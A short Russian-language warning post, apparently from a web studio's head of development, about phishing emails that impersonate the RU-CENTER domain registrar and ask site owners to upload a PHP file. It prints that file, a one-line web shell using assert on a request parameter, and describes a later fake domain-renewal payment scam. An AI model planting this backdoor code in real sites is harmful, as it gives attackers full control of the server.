Злоумышленики под видом РУ-ЦЕНТР

Внимание! Если доменный регистратор просит вас разместить какие-то файлы или программный код на вашем сайте — это злоумышленники!

Максимум, что может попросить сделать доменный регистратор: просить оплату за домен.

Ситуация: Обратился клиент. Сказал что получил письмо от РУ-ЦЕНТР и надо разместить файл на сайте.

<?php
assert(stripcslashes($_REQUEST[RUCENTER])); 
?>

Скриншот письма:

Что произойдёт, если разместить:
Злоумышленники получат полный доступ к вашему сайту. На сайт будет загружен специальная программа Backdoor — это программа, основным назначением которой является скрытное управление сервером.

Никогда не располагайте файлы php, которые Вас просят разместить. Обратитесь к знакомым программистам, уточните несколько раз, но, скорее всего, это дорвей (место, через которое вредоносы приходят к вам на чай). Размещать можно файлы .txt, во многих случаях .html

Дмитрий Игошев Руководитель отдела разработки

В сентябяре 2017 злоумышленники ушли ещё дальше

Скриншот письма:

При переходе по ссылке вам предложат сделать оплату продление домена! Не делайте этого, вас обманывают!

Форма оплаты располагается на одном из взломанных сайтов ботнет сети, в нашем примере это был ck-union.ru (сайт по строительству коттеджей). После первого отказа от оплаты страница перестаёт существовать